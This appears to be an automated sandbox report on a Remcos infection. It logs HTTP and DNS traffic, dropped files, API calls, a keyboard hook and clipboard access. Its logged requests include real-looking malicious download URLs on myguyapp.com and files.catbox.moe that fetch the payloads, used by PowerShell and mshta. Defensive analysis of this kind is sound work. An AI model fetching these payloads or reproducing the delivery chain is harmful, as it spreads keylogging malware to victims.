    Source: global traffic | HTTP traffic detected: GET /W2.pdf HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: myguyapp.com
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /msword.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: myguyapp.com
        Connection: Keep-Alive
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (9 occurrences)
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CED889 InternetReadFile,SetEvent,GetLastError,SetEvent,38_2_00CED889
    Source: global traffic | HTTP traffic detected: GET /0o8vth.bat HTTP/1.1
        Accept: */*
        Accept-Language: en-CH
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: files.catbox.moe
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /W2.pdf HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: myguyapp.com
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /msword.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: myguyapp.com
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1
        Host: geoplugin.net
        Cache-Control: no-cache
    Source: global traffic | DNS traffic detected: DNS query: files.catbox.moe
    Source: global traffic | DNS traffic detected: DNS query: myguyapp.com
    Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
    Source: global traffic | DNS traffic detected: DNS query: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
    Source: global traffic | DNS traffic detected: DNS query: me-work.com
    Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
    Source: msword.exe.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: msword.exe.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: msword.exe.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: msword.exe.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: msword.exe.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: msword.exe.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: msword.exe.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: msword.exe.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: msword.exe.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: msword.exe, 0000000D.00000000.1841551557.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000D.00000002.1868760543.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.11.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: msword.exe.11.dr | String found in binary or memory: http://ocsp.digicert.com0
    Source: msword.exe.11.dr | String found in binary or memory: http://ocsp.digicert.com0A
    Source: msword.exe.11.dr | String found in binary or memory: http://ocsp.digicert.com0C
    Source: msword.exe.11.dr | String found in binary or memory: http://ocsp.digicert.com0X
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001E.00000000.1919152978.0000000000D25000.00000002.00000001.01000000.0000000F.sdmp, LinkHub.com, 00000026.00000000.1944526047.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2070151475.0000000000D45000.00000002.00000001.01000000.00000011.sdmp, Clinton.26.dr, Propose.com.17.dr, LinkHub.com.30.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: msword.exe.11.dr | String found in binary or memory: http://www.digicert.com/CPS0
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.dr | String found in binary or memory: http://x1.i.lencr.org/
    Source: mshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859438756.000000000A863000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbl
    Source: mshta.exe, 00000000.00000003.1843566389.000000000A863000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856565051.000000000A8A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox
    Source: mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe
    Source: mshta.exe, 00000000.00000003.1843154558.0000000003202000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1848250807.0000000003214000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845396099.000000000320C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858635359.0000000003216000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/
    Source: mshta.exe, 00000000.00000002.1858472239.00000000031B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1859827456.000000000A8C7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845946616.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A8CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652474186.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652498264.000000000317E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652498264.0000000003162000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1652345034.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856157178.000000000A8CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845455360.00000000031AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1845455360.000000000317F000.00000004.00000020.00020000.00000000.sdmp, c2.hta | String found in binary or memory: https://files.catbox.moe/0o8vth.bat
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/0o8vth.bat1
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/0o8vth.batC
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/0o8vth.bat_
    Source: mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/0o8vth.battH
    Source: mshta.exe, 00000000.00000002.1858235674.000000000314E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe/p
    Source: mshta.exe, 00000000.00000003.1856817217.0000000009937000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://files.catbox.moe;
    Source: mshta.exe, 00000000.00000002.1859438756.000000000A840000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1843566389.000000000A840000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
    Source: tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903280293.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1905973754.0000000000890000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910330703.0000000000568000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910582302.00000000028D0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1970800280.0000000003108000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1971387427.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1928035896.0000000003490000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928267777.0000000003290000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928406070.0000000003600000.00000004.00000020.00020000.00000000.sdmp, 0o8vth[1].bat.0.dr, temp.bat.0.dr | String found in binary or memory: https://myguyapp.com/W2.pdf
    Source: tasklist.exe, 00000013.00000003.1896304387.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897560257.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdf&vO
    Source: cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/W2.pdfD
    Source: mshta.exe, 00000000.00000002.1859755498.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1856790839.000000000AD10000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000D.00000002.1870410967.00000000023C0000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000D.00000002.1869277410.000000000087E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000D.00000002.1870666029.0000000002590000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897779847.00000000030C0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897227873.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1896304387.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897560257.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903280293.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1905973754.0000000000890000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910330703.0000000000568000.00000004.00000020.00020000.00000000.sdmp, extrac32.exe, 0000001A.00000002.1910582302.00000000028D0000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1970800280.0000000003108000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001F.00000002.1971387427.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000020.00000002.1928035896.0000000003490000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928267777.0000000003290000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000023.00000002.1928406070.0000000003600000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zip
    Source: tasklist.exe, 00000013.00000002.1897227873.0000000000D48000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zip.
    Source: tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zip7
    Source: cmd.exe, 00000020.00000002.1927832628.00000000030A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipF
    Source: tasklist.exe, 00000015.00000003.1901999464.000000000071C000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000002.1903882580.000000000071C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipK
    Source: msword.exe, 0000000D.00000002.1869277410.000000000087E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipiZ
    Source: Propose.com, 0000001E.00000003.1925118973.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925065278.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926628658.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924979857.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924940162.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925001537.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926572699.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925043539.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1924959596.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925023697.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1926599427.0000000000E95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf
    Source: cmd.exe, 00000023.00000002.1928219562.00000000030E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP
    Source: Propose.com, 0000001E.00000003.2217664532.000000000355F000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001E.00000003.1925473839.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp, Propose.com.17.dr, Protocol.26.dr, LinkHub.com.30.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: LinkHub.com.30.dr | String found in binary or memory: https://www.globalsign.com/repository/0
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknown | HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49738 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00D09FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

    E-Banking Fraud

    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

    System Summary

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe
    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\EquationsHighlights
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\OurProperty
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\ItemAnytime
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\ExpenditureBlood
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | File created: C:\Windows\DentalSubtle
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_0040497C
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_00406ED2
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004074BB
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C98017
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C7E1F0
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C8E144
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C722AD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C922A2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CAA26E
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C8C624
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CFC8A4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CAE87F
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CA6ADE
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE2A05
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CD8BFF
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C8CD7A
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C9CE10
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CA7159
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C79240
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00D05311
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C796E0
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C91704
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C91A76
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C97B8B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C79B60
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00C97DBA
